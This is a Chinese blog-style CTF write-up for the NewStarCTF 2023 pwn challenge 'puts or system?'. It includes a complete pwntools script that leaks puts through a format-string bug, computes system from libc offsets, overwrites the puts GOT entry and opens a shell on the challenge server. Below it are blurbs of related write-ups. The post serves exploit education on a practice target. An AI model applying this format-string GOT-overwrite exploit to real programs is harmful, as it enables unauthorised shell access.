[buuctf]NewStarCTF 2023 公开赛道 puts or system?题解

最新推荐文章于 2025-12-02 20:46:18 发布
原创 最新推荐文章于 2025-12-02 20:46:18 发布 · 208 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络 #安全 #CTF #pwn

就只考了一个格式化字符串。

1.先泄露puts的地址

2.计算得到system函数地址

3.覆盖puts_got

4.调用system("/bin/sh")

题解:

from pwn import *
context.arch="amd64"
context.os="linux"
def log_addr(name,addr):
    log.success(f"find {name} successfully!------>"+str(hex(addr)))
#p=process("./putsorsys")
p=remote("node5.buuoj.cn",25556)
elf=ELF("./putsorsys")
libc=ELF("/glibc-all-in-one/libs/2.35-0ubuntu3.10_amd64/libc.so.6")
puts_got=elf.got['puts']
payload=b"%9$s...."+p64(puts_got)
p.sendline(b"1")
p.recvuntil(b"What's it\n")
p.send(payload)
print(hexdump(payload))
p.recvuntil(b"Oh thanks,There is my gift:\n")
recv=p.recv(6)
print(recv)
puts_addr=u64(recv.ljust(8,b"\x00"))
log_addr("puts_addr",puts_addr)
libc_addr=puts_addr-0x084ed0#libc.symbols['puts']
log_addr("libc_addr",libc_addr)
system=libc_addr+0x054d60#libc.symbols['system']
log_addr("system_addr",system)
p.sendline(b"1")
payload=fmtstr_payload(8,{puts_got:system})
p.send(payload)
p.interactive()

记录:

flag为动态 

EROORvbsyes
关注
[NewStarCTF 2023 公开赛道]ret2libc(BUUCTF
Welcome To Myon'Blog !
05-22 657
本文描述了一个典型的ret2libc漏洞利用过程。首先,通过IDA反编译发现main函数中的read函数存在溢出漏洞,但程序中没有直接提供/bin/sh字符串和system函数。通过puts函数泄露libc基址,进而计算system函数和/bin/sh字符串的地址。利用gadget构造payload,首先通过puts泄露地址,然后再次发送payload调用system函数执行/bin/sh,最终成功获取flag。整个过程展示了如何在没有直接提供libc文件的情况下,通过泄露地址和计算偏移来实现漏洞利用。
NewStarCTF 2023 [WEEK 3] PWN
Xzzzz911的博客
10-28 1290
这次题目确实上了一个档次,有些东西确实也不怎么好理解,慢慢来,积少成多,相同题型放一起总结,总会得出好的结论,就一句话:多做多总结,冲冲冲!!!
NewStarCTF 公开赛道
m0_62129839的博客
10-29 1346
reverse一下倒着取得到最后将回显逆转收获无2.文件包含先进行一个代码审计1219893521,伪随机,给了值,爆破出种子就行if语句playload:flag收获base被禁用rot13反序列化,这类题我觉得是我比较薄弱的地方,好好研究研究:poc链我们这样分析,尾链是Sec-> invoke,倒推__invoke() //当脚本尝试将对象调用为函数时触发clone() //当把一个对象赋给另一个对象时自动调用。
NewStarCTF 2023 WEEK3|PWN
weixin_51890658的博客
10-24 762
1.puts or system?根据名字提示把puts改为system,开了canary,但它没有用存在格式化字符串漏洞,且有n次思路:relro保护没开,可修改got表,且给了libc库,通过格式化第一次泄露got,获得system函数,第二次修改puts的got表为system即可get shellEXP:from pwn import * from LibcSearcher import * from ctypes import * sh=remote("node4.buuoj.cn",27323)
NewStarCTFWEEK1部分题解
m0_51251108的博客
09-26 1281
NewStarCTFWEEK1
2022NewStarCTF pwn大部分题解
m0_51251108的博客
11-18 2300
今年9~10月的比赛,题目从易到难,知识面广,还是很不错的,复现一下这比赛的pwn
2024第十五届蓝桥杯网络安全赛项WriteUp
返璞归真的博客
04-27 3191
2024第十五届蓝桥杯CTF题解
蓝桥杯训练题目若干(东华20考研挑战题1-50)
zhou_hao_ran的博客
06-04 5381
文章目录前言1: Huffuman树2 回文数3 字母图形4 大阶乘计算5 回形取数6 龟兔赛跑预测7 Sine之舞8 矩形面积交9 矩阵乘法10 分解质因数11 字符串对比12 时间转换13 2n皇后问题14 芯片测试15 FJ的字符串16 8皇后·改17 棋盘多项式18 3000米排名预测19 排队打水问题20 产生数21 分分钟的碎碎念22 现代诗如蚯蚓23 函数求值24 密码锁25 超级玛丽26 聪明的美食家27 士兵排队问题28 师座操作系统29 洗牌30 盾神与砝码称重31 文化之旅32 网络
超详细讲解[NewStarCTF 2023 公开赛道]SMC
2401_84404094的博客
06-18 1923
本来想写一个针对“新手小白”如何写破解脚本的,把SMC这道题放入了例题中,打开看到后感觉挺有意思的,就写了关于这道题的详细讲解。首先拿到题目SMC,其中是一种软件保护技术,通过在运行时修改自身代码来隐藏真实逻辑。
NewStarCTF 2023 公开赛道 WEEK4|PWN
weixin_51890658的博客
11-01 757
1.game考点:一字节漏洞开了canary和地址随机,拖入ida分析,一个小菜单,在初始化时选择给v6赋值,用它来确定是送原石还是kfc联名套餐,在循环中看出只能选择一个 1为送原石的条件,当v7>0x3ffff可泄露system地址 myread函数中存在一字节漏洞,输入8个非\n数据,可把v6修改为0,所以先把v6赋值为1,通过一字节洞把v6赋为0,可进入送原石,然后v8,v9都为1了,此时可进入这个地方,libc库查出putssystem的偏移量,然后通过偏移量把puts改为system,(v5
[NewStarCTF 公开赛道]ret2libc(BUUCTF
Welcome To Myon'Blog !
05-20 1125
本文描述了一个64位程序的栈溢出漏洞利用过程。程序开启了NX保护,且没有直接提供/bin/sh字符串和system函数。通过分析,作者采用了ret2libc攻击思路,利用puts函数泄露其真实地址,进而计算libc基址,获取system函数和/bin/sh字符串的地址。首先,通过构造第一个payload,利用pop_rdi和ret指令将puts函数的真实地址泄露出来,并返回到main函数。接着,构造第二个payload,将/bin/sh字符串地址传入rdi寄存器,调用system函数,最终成功获取shell
网闸的作用与功能:2025新型网闸全面介绍!
2501_93735104的博客
11-28 769
网闸的作用与功能,简单来说,就是安全隔离+数据交换,今天我们要重点说的一种新型网闸产品,是传统网闸+文件摆渡系统的结合体,以《Ftrans网络安全隔离与信息交换系统》为典型代表,不仅包含网闸隔离、协议玻璃、数据交换等功能,还支持面向用户的跨网文件传输,有效防止敏感信息泄露,提供多种传输方式、支持多种使用场景、增强数据安全性和合规性,降低运营成本。:提供全链路API集成管控能力。可控数据交换:隔离的同时,专门开一条唯一的、能管控的安全通道,解决 “完全断开就没法干活” 的问题,保证必要数据能安全交换。
自定义协议设计与实践:从协议必要性到JSON流式处理
祯的博客
11-28 1075
本文探讨了自定义网络协议的必要性及其实现方法。首先分析了通用协议(如HTTP)的局限性:性能开销大、功能冗余、通信模式不匹配等问题。其次阐述了自定义协议的优势:极致性能、高度定制化、低资源消耗和增强安全性。文章详细介绍了自定义协议的应用场景(物联网、游戏、区块链等)和开发代价(高维护成本、调试困难等)。重点讲解了基于TCP的流式数据处理方法,提出"长度头+消息体"的解决方案,并给出基于jsoncpp的实现示例。
前端跨域解决方案
2509_93942660的博客
11-28 528
如果涉及带凭证的请求,比如cookie,还得加Access-Control-Allow-Credentials: true,并且Origin不能是通配符。原理很简单,前端请求发给同域的代理,代理再转发给目标服务器,绕过浏览器限制。比如,你页面里嵌了个第三方iframe,想和它通信,就可以用window.postMessage发消息,对方用message事件接收。JSONP适合老项目,CORS是首选标准,代理在开发时好用,WebSocket专攻实时,postMessage处理iframe问题。
网络安全(黑客技术)—2025自学手册
2401_84760527的博客
11-24 1507
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
如何解决ws2_32.dll丢失问题:解决网络相关错误和程序崩溃的完美方案
xiaoshuotui的博客
12-02 788
当你尝试启动一个程序或游戏时,突然遭遇“ws2_32.dll丢失”的错误,这可能会让你的计划受阻。幸运的是,这个问题通常有直接的解决方法。本文将详细介绍如何找出丢失或损坏的ws2_32.dll文件,并提供有效的修复策略,让你的电脑重新运行起来。
计算机网络 浅谈网络的基础概念
yuzhaokangcode的博客
11-28 872
计算机网络发展经历了从独立主机到广域互联的演进过程。网络协议是确保不同设备间通信的关键约定,需要国际标准化组织(如IEEE、ISO)制定统一标准。TCP/IP五层模型(物理层、数据链路层、网络层、传输层、应用层)通过分层设计实现模块化解耦,每层都有特定功能。数据传输时需要进行封装(添加报头)和解包处理,IP地址用于标识网络中的主机,MAC地址则用于局域网设备识别。网络通信本质是数据在各协议层间的传递过程,IP网络通过虚拟化技术实现了全球网络的互联互通。
学习:《The QUIC Transport Protocol: Design and Internet-Scale Deployment》
最新发布
qq_45913654的博客
12-02 406
QUIC协议是基于UDP的新型传输协议,旨在解决TCP协议在互联网环境中的固有缺陷。
【AI大模型对话】流式输出和非流式输出的定义和区别
mobangde的博客
11-30 692
分享了流式输出和非流式输出的定义和区别
[NewStarCTF 公开赛道]ret2libc
11-16
文章提到了[NewStarCTF 2023 公开赛道]ret2libc(BUUCTF)的exp代码,其中包含了详细的解题步骤和代码实现。代码设置了上下文环境,使用`ELF`类加载目标程序,确定了关键函数地址如`puts`的PLT和GOT地址、`main`函数...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值